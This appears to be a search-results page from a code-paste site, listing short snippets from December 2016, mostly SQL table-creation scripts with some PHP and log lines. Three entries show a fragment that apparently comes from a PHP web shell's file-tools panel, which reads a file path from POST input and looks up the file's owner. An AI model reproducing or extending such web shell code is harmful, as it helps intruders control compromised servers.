42.7K results in 835 ms
9 years ago · Dec 19, 2016, 10:52 AM
Return-Path) of the message. If not empty, * will be sent
9 years ago · Dec 19, 2016, 10:46 AM
go USE [Sergey.Ubogov] go if OBJECT_ID('tarifs', 'U') IS NOT NULL DROP TABLE tarifs go CREATE TABLE tarifs ( Name nvarchar(100)
9 years ago · Dec 19, 2016, 10:42 AM
TABLE IF EXISTS `bans`; CREATE TABLE IF NOT EXISTS `bans` ( `id` int(11) NOT
9 years ago · Dec 19, 2016, 09:33 AM
go use [_Kvashnina] go if object_id('_Kvashnina.Currencies', 'U') is not null drop table _Kvashnina.Currencies go create table Currencies ( id tinyint, code varchar(3),
9 years ago · Dec 19, 2016, 09:28 AM
go use [_Kvashnina] go if object_id('_Kvashnina.Plans', 'U') is not null drop table _Kvashnina.Plans go create table Plans ( name varchar(100), mounthCost float,
9 years ago · Dec 19, 2016, 09:25 AM
switch ($this->options['type']) { case "zip": if (!$this->create_zip()) { $this->error[] = "Could not create zip file."; return 0;
9 years ago · Dec 19, 2016, 07:40 AM
switch ($this->options['type']) { case "zip": if (!$this->create_zip()) { $this->error[] = "Could not create zip file."; return 0;
9 years ago · Dec 19, 2016, 07:04 AM
drop table stuff go if object_id('people') is not null drop table people go create table people ( id int
9 years ago · Dec 19, 2016, 07:00 AM
CORE> glink_core_regiSter_transport: unable to create log context for [rpm:smem] 0.266093] smd_channel_probe_now: allocation table not ifitialized [ .266377] msm_rpm_trans_notify_state: glink
9 years ago · Dec 19, 2016, 06:44 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Dec 19, 2016, 06:42 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Dec 19, 2016, 05:44 AM
Go USE [Lab3] GO CREATE TABLE Rate_info ( rate_id int NOT NULL identity primary key,
9 years ago · Dec 19, 2016, 05:36 AM
CREATE SCHEMA [Валюты] GO IF OBJECT_ID('[Mamonov].[Валюты].change', 'U') IS NOT NULL DROP TABLE [Mamonov].[Валюты].change GO CREATE TABLE [Mamonov].[Валюты].change ( Sell nvarchar(3)
9 years ago · Dec 19, 2016, 05:35 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Dec 19, 2016, 05:00 AM
NOT NULL, Surname nvarchar(50) NOT NULL, ); GO CREATE TABLE AddressBook ( AddressId int IDENTITY(1,1)
9 years ago · Dec 19, 2016, 03:06 AM
executing 1 of 1 create table IF NOT EXISTS player_stats ( id integer prim...
9 years ago · Dec 19, 2016, 03:02 AM
executing 1 of 1 create table IF NOT EXISTS player_stats ( id integer prim...
9 years ago · Dec 19, 2016, 01:11 AM
T:17288 DEBUG: 1Channel: Running: CREATE TABLE IF NOT EXISTS seasons (season UNIQUE, contents)
9 years ago · Dec 18, 2016, 11:04 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
Total pages: 2134